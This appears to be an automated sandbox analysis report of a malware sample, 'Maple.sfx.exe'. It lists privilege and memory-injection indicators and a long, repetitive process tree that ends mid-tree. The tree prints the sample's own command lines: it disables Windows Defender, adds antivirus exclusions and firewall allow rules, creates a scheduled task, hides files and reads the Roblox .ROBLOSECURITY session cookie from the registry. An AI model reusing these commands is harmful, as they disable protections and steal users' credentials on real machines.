Token: SeBackupPrivilege	2412	powershell.exe
Token: SeRestorePrivilege	2412	powershell.exe
Token: SeShutdownPrivilege	2412	powershell.exe
Token: SeDebugPrivilege	2412	powershell.exe
Token: SeSystemEnvironmentPrivilege	2412	powershell.exe
Token: SeRemoteShutdownPrivilege	2412	powershell.exe
Token: SeUndockPrivilege	2412	powershell.exe
Token: SeManageVolumePrivilege	2412	powershell.exe
Token: 33	2412	powershell.exe
Token: 34	2412	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5884 wrote to memory of 3704	5884	Maple.sfx.exe	81
PID 5884 wrote to memory of 3704	5884	Maple.sfx.exe	81
PID 3704 wrote to memory of 2980	3704	loader.exe	83
PID 3704 wrote to memory of 2980	3704	loader.exe	83
PID 3704 wrote to memory of 4356	3704	loader.exe	84
PID 3704 wrote to memory of 4356	3704	loader.exe	84
PID 3704 wrote to memory of 4616	3704	loader.exe	85
PID 3704 wrote to memory of 4616	3704	loader.exe	85
PID 2980 wrote to memory of 3216	2980	Server.exe	86
PID 2980 wrote to memory of 3216	2980	Server.exe	86
PID 2980 wrote to memory of 3216	2980	Server.exe	86
PID 2980 wrote to memory of 2896	2980	Server.exe	87
PID 2980 wrote to memory of 2896	2980	Server.exe	87
PID 4356 wrote to memory of 5072	4356	Maple.exe	88
PID 4356 wrote to memory of 5072	4356	Maple.exe	88
PID 4356 wrote to memory of 1744	4356	Maple.exe	91
PID 4356 wrote to memory of 1744	4356	Maple.exe	91
PID 4356 wrote to memory of 2412	4356	Maple.exe	93
PID 4356 wrote to memory of 2412	4356	Maple.exe	93
PID 4616 wrote to memory of 3560	4616	loader.exe	95
PID 4616 wrote to memory of 3560	4616	loader.exe	95
PID 3560 wrote to memory of 768	3560	Server.exe	97
PID 3560 wrote to memory of 768	3560	Server.exe	97
PID 3560 wrote to memory of 768	3560	Server.exe	97
PID 3560 wrote to memory of 2480	3560	Server.exe	98
PID 3560 wrote to memory of 2480	3560	Server.exe	98
PID 4616 wrote to memory of 4760	4616	loader.exe	99
PID 4616 wrote to memory of 4760	4616	loader.exe	99
PID 4616 wrote to memory of 5816	4616	loader.exe	100
PID 4616 wrote to memory of 5816	4616	loader.exe	100
PID 4356 wrote to memory of 5012	4356	Maple.exe	101
PID 4356 wrote to memory of 5012	4356	Maple.exe	101
PID 4356 wrote to memory of 5136	4356	Maple.exe	103
PID 4356 wrote to memory of 5136	4356	Maple.exe	103
PID 4356 wrote to memory of 3696	4356	Maple.exe	105
PID 4356 wrote to memory of 3696	4356	Maple.exe	105
PID 2896 wrote to memory of 5004	2896	conhost.exe	107
PID 2896 wrote to memory of 5004	2896	conhost.exe	107
PID 2896 wrote to memory of 920	2896	conhost.exe	109
PID 2896 wrote to memory of 920	2896	conhost.exe	109
PID 4356 wrote to memory of 2472	4356	Maple.exe	111
PID 4356 wrote to memory of 2472	4356	Maple.exe	111
PID 5816 wrote to memory of 3956	5816	loader.exe	113
PID 5816 wrote to memory of 3956	5816	loader.exe	113
PID 3956 wrote to memory of 4184	3956	Server.exe	114
PID 3956 wrote to memory of 4184	3956	Server.exe	114
PID 3956 wrote to memory of 4184	3956	Server.exe	114
PID 3956 wrote to memory of 4856	3956	Server.exe	115
PID 3956 wrote to memory of 4856	3956	Server.exe	115
PID 4356 wrote to memory of 1500	4356	Maple.exe	116
PID 4356 wrote to memory of 1500	4356	Maple.exe	116
PID 5816 wrote to memory of 1560	5816	loader.exe	118
PID 5816 wrote to memory of 1560	5816	loader.exe	118
PID 5816 wrote to memory of 5836	5816	loader.exe	119
PID 5816 wrote to memory of 5836	5816	loader.exe	119
PID 2896 wrote to memory of 4736	2896	conhost.exe	120
PID 2896 wrote to memory of 4736	2896	conhost.exe	120
PID 4356 wrote to memory of 5464	4356	Maple.exe	122
PID 4356 wrote to memory of 5464	4356	Maple.exe	122
PID 4356 wrote to memory of 3392	4356	Maple.exe	124
PID 4356 wrote to memory of 3392	4356	Maple.exe	124
PID 2896 wrote to memory of 980	2896	conhost.exe	126
PID 2896 wrote to memory of 980	2896	conhost.exe	126
PID 4356 wrote to memory of 4284	4356	Maple.exe	128

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 21 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1744	attrib.exe
5140	attrib.exe
392	attrib.exe
5496	attrib.exe
2592	attrib.exe
1436	attrib.exe
1064	attrib.exe
1120	attrib.exe
4288	attrib.exe
4136	attrib.exe
3236	attrib.exe
220	attrib.exe
5716	attrib.exe
4700	attrib.exe
3528	attrib.exe
4588	attrib.exe
3156	attrib.exe
6116	attrib.exe
1324	attrib.exe
2204	attrib.exe
2908	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Maple.sfx.exe
"C:\Users\Admin\AppData\Local\Temp\Maple.sfx.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5884
- C:\Users\Admin\AppData\Local\Temp\loader.exe
  "C:\Users\Admin\AppData\Local\Temp\loader.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3704
- - C:\Users\Admin\AppData\Local\Temp\Server.exe
    "C:\Users\Admin\AppData\Local\Temp\Server.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2980
  - - C:\Users\Admin\AppData\Roaming\Server.exe
      "C:\Users\Admin\AppData\Roaming\Server.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3216
    - - C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:2304
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:5900
  - - C:\Users\Admin\AppData\Roaming\conhost.exe
      "C:\Users\Admin\AppData\Roaming\conhost.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious behavior: AddClipboardFormatListener
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2896
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\conhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5004
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'conhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:920
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Ondrive.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4736
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Ondrive.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:980
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Ondrive" /tr "C:\Users\Admin\AppData\Roaming\Ondrive.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5576
- - C:\Users\Admin\AppData\Local\Temp\Maple.exe
    "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4356
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5072
  - - C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
      4⤵
      Views/modifies file attributes
      PID:1744
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2412
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5012
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5136
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3696
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2472
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1500
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5464
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3392
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:4284
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      PID:5572
    - - C:\Windows\system32\PING.EXE
        
        ping localhost
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5452
- - C:\Users\Admin\AppData\Local\Temp\loader.exe
    "C:\Users\Admin\AppData\Local\Temp\loader.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4616
  - - C:\Users\Admin\AppData\Local\Temp\Server.exe
      "C:\Users\Admin\AppData\Local\Temp\Server.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3560
    - - C:\Users\Admin\AppData\Roaming\Server.exe
        
        "C:\Users\Admin\AppData\Roaming\Server.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:768
    - - C:\Users\Admin\AppData\Roaming\conhost.exe
        
        "C:\Users\Admin\AppData\Roaming\conhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:2480
  - - C:\Users\Admin\AppData\Local\Temp\Maple.exe
      "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
      4⤵
      Executes dropped EXE
      PID:4760
  - - C:\Users\Admin\AppData\Local\Temp\loader.exe
      "C:\Users\Admin\AppData\Local\Temp\loader.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:5816
    - - C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3956
      - C:\Users\Admin\AppData\Roaming\Server.exe
        
        "C:\Users\Admin\AppData\Roaming\Server.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4184
      - C:\Users\Admin\AppData\Roaming\conhost.exe
        
        "C:\Users\Admin\AppData\Roaming\conhost.exe"
        6⤵
        Executes dropped EXE
        
        PID:4856
    - - C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        5⤵
        Executes dropped EXE
        
        PID:1560
    - - C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5836
      - C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5568
      - C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        6⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4868
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3496
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        7⤵
        Views/modifies file attributes
        
        PID:5496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5896
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4932
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1300
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5968
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5932
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:560
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        7⤵
        
        PID:5216
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        7⤵
        Detects videocard installed
        
        PID:1528
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5876
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1684
      - C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5504
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5716
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        7⤵
        Executes dropped EXE
        
        PID:2068
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3724
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4488
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        8⤵
        Executes dropped EXE
        
        PID:3228
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        8⤵
        Executes dropped EXE
        
        PID:3616
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1720
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        9⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:2444
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        10⤵
        
        PID:5988
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        10⤵
        Views/modifies file attributes
        
        PID:220
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5580
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        10⤵
        
        PID:4928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        10⤵
        
        PID:5960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        10⤵
        
        PID:3412
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        10⤵
        
        PID:5732
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        10⤵
        
        PID:2644
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        10⤵
        
        PID:5100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:780
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        10⤵
        Detects videocard installed
        
        PID:3236
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5268
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        11⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3052
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3548
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        10⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5812
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        10⤵
        Executes dropped EXE
        
        PID:5096
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4328
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        11⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1856
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        11⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:5204
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        12⤵
        
        PID:4004
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        12⤵
        Views/modifies file attributes
        
        PID:2592
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2584
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        12⤵
        
        PID:1324
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        12⤵
        
        PID:4396
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        12⤵
        
        PID:2176
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        12⤵
        
        PID:4564
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        12⤵
        
        PID:2908
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:116
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        12⤵
        Detects videocard installed
        
        PID:5060
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5456
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        13⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5360
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        11⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5056
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        12⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5760
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        12⤵
        Executes dropped EXE
        
        PID:1796
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        12⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5944
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        13⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4640
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        13⤵
        Executes dropped EXE
        
        PID:4904
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        13⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:6088
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        14⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4388
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        14⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:4036
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        15⤵
        
        PID:4408
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        15⤵
        Views/modifies file attributes
        
        PID:6116
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2068
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5372
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        15⤵
        
        PID:3612
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        15⤵
        
        PID:4324
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        15⤵
        
        PID:6104
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        15⤵
        
        PID:4556
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        15⤵
        
        PID:5904
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3460
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        15⤵
